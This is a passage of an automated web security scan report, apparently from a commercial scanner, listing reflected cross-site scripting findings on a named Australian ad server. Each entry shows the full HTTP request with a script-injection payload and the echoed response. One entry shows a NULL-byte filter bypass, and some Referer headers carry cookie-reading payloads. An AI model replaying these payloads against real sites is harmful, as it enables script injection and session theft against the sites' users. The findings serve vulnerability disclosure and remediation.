2.645. http://media.sensis.com.au/hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59b1"><script>alert(1)</script>e96462b849 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randome59b1"><script>alert(1)</script>e96462b849=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:43 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 506
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_randome59b1"><script>alert(1)</script>e96462b849=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122
...[SNIP]...

2.646. http://media.sensis.com.au/hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d76"><script>alert(1)</script>21b0d6a3ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?40d76"><script>alert(1)</script>21b0d6a3ad=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 509
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?40d76"><script>alert(1)</script>21b0d6a3ad=1" target="_new">
...[SNIP]...

2.647. http://media.sensis.com.au/hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f3a"><script>alert(1)</script>3b6857a647d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere9f3a"><script>alert(1)</script>3b6857a647d/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 374
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000e9f3a"><script>alert(1)</script>3b6857a647d/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373" target="_new">
...[SNIP]...

2.648. http://media.sensis.com.au/hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f6bc"><script>alert(1)</script>2f3ddeb3f88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random2f6bc"><script>alert(1)</script>2f3ddeb3f88=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:56 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 374
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000/acc_random2f6bc"><script>alert(1)</script>2f3ddeb3f88=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373" target="_new">
...[SNIP]...

2.649. http://media.sensis.com.au/hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71fa6"><script>alert(1)</script>6aa4a944a5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?71fa6"><script>alert(1)</script>6aa4a944a5e=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:54 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 377
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?71fa6"><script>alert(1)</script>6aa4a944a5e=1" target="_new">
...[SNIP]...

2.650. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1d4"><script>alert(1)</script>dd078b9bca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver8a1d4"><script>alert(1)</script>dd078b9bca2/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:26 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 443
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033e2d1f459202000000008a1d4"><script>alert(1)</script>dd078b9bca2/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415/relocate=http://premier.ticketek.com.au/shows/Show.aspx
...[SNIP]...

2.651. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9b7"><script>alert(1)</script>62373f1999b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random2a9b7"><script>alert(1)</script>62373f1999b=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:27 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 1510
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.3;sz=644x50;click=http://media.sensis.com.au/ADCLICK/CID=000331961f45920200
...[SNIP]...
<A href="http://media.sensis.com.au/ADCLICK/CID=000331961f45920200000000/acc_random2a9b7"><script>alert(1)</script>62373f1999b=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415/relocate=http://ad.au.doubleclick.net/jump/N799.Sensis12/B4870169.
...[SNIP]...

2.652. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb8cc'-alert(1)-'84c68a85969 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_randomeb8cc'-alert(1)-'84c68a85969=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:29 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 1450
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.3;sz=644x50;click=http://media.sensis.com.au/ADCLICK/CID=000331961f45920200000000/acc_randomeb8cc'-alert(1)-'84c68a85969=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415/relocate=;ord=?">
...[SNIP]...

2.653. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00fdc63</script><script>alert(1)</script>a98d3dceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdc63</script><script>alert(1)</script>a98d3dceeb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?%00fdc63</script><script>alert(1)</script>a98d3dceeb7=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:24 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 1598
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.3;sz=644x50;click=http://media.sensis.com.au/ADCLICK/CID=000331961f45920200000000/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?%00fdc63</script><script>alert(1)</script>a98d3dceeb7=1&relocate=;ord=855321738428?">
...[SNIP]...

2.654. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39870"><script>alert(1)</script>417f90cf5bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?39870"><script>alert(1)</script>417f90cf5bd=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:16 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 1558
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.3;sz=644x50;click=http://media.sensis.com.au/ADCLICK/CID=000331961f45920200
...[SNIP]...
edia.sensis.com.au/ADCLICK/CID=000331961f45920200000000/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?39870"><script>alert(1)</script>417f90cf5bd=1&relocate=http://ad.au.vulnerable.ad.partner/jump/N799.Sensis12/B4870169.3;sz=644x50;click=http://media.sensis.com.au/ADCLICK/CID=000331961f45920200000000/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.EN
...[SNIP]...

